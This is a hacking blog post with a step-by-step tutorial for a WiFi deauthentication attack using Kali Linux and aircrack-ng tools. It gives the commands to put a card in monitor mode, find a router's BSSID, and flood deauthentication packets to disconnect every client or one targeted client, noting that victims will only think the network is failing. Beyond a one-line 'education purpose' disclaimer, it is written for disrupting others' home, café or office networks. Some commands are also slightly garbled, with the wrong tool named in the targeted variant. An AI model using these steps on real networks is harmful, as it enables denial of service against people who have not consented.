Hi Readers, due to exams I recently not posted any stuff for you so decided to teach you a cool method of blocking Internet Access through WIFI. This attack is used to block the Internet in Home Networks, Internet CafĂ©, or Office Networks which uses WIFI. When attacker uses this attack victim will only think that there is a Network Connectivity Problem. So let’s start simply with Client Communication.
:: About ::
You had seen the above pic, here (i)Client is Connected to WIFI Network, (ii) Client send the required data on this connection. (iii) Now Clients sends De-Authentication packets to WIFI, which states Client want to disconnect. (iv) Reply from WIFI sends and connection ends gracefully.
:: How Hacker Attacks ::
Seeing hope you will understand. So let’s start with practical work.
:: Practical ::
First prepare your computer, we are going to use Kali Linux,
You need WIFI Router with established connection. [ex:- Cisco. I am using This]. Make sure you are connected. To Check use this command in CMD.
“ping [Router IP]”
1} When you are connected. Go to Kali-Linux Machine.
2} Open the command terminal. Use the Following Commands:- (Pics are given below to check in detail)>> airmon-ng //You know this Command.
>> airmon-ng start wlan0 //To start the Connection
>> clear //To clear the above text in the terminal
Now we will use Airodump Command.
>> airodump-ng mon0 //To check wireless Data.
Now above I mentioned my Data Card. (Cisco). Find it and Copy the BSSID.>> aireplay-ng //You can See Attack Types. See The Highlighted One.
Now main Command:
>> aireplay-ng --deauth 20 –a BSSID mon0 –ignore-negative-one
Change the BSSID with copied BSSID Code. And here 20 is the De-Authentication Packet Value, you can change it.
>> Come Back to your Windows. Where you are connected with Cisco Wireless Card.
>> Open CMD, and use this Command:
>> ping [Router IP] –t
If you are Connected it will send Packets. Now Check After using Jammer Command it will disconnect from Network. See Pic.
You can see In Kali Linux Machine De-Auth request is Sending and in Windows it is Disconnected.....
:: Errors ::
In this Attack You can Get a Error like, "mon0 is on channel 2, But the AP uses channel 1"
In this Case You have to change Channel. Don't be panic its Simple::
>> Open Another Terminal in Linux Machine.
>> Use this Command. Then it will change the Channel number.
>> iwconfig mon0 channel 1
Thats it... Its Done.....:: Extra ::
Just Think on the Present Wifi Network 4 Clients are Connected. Using the above command All Clients will disconnected. So What You will Do To Disconnect Single or Specific Client. Use this Command.
>> airodump-ng --bssid [BSSID] -c 1 mon0
You will Get The Clients Details like Mac- Address.
Now to Stop is Connection. use this command:
>> airodump-ng --deauth 20 -a [BSSID] -c [MAC ADDRESS] mon0 --ignore-negative-one
Now De-Authentication Packet will Send. Then he will Disconnected.
So You Learned How To Stop Others To Use Wifi Network. But Don't miss-use this. Only Education Purpose.
Share This Post and Keep Visiting
// Follow me on Twitter \\
// Like My Facebook Page To Get Directly Stuff on Facebook Wall \\
// Like My Official Facebook Page \\
0 comments: